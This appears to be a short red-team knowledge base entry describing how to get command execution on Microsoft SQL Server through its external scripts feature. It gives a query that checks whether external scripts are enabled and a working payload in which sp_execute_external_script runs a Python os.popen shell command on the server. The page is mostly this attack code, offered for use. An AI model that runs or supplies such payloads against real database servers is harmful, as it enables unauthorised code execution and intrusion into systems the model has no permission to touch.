Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SQL / MSSQL / EXECUTION

External-Scripts

Use when external scripts are enabled.

Check

SELECT name,value_in_use FROM sys.configurations WHERE name='external scripts enabled';

Python RCE

EXEC sp_execute_external_script @language=N'Python',@script=N'import os;print(os.popen("whoami").read())';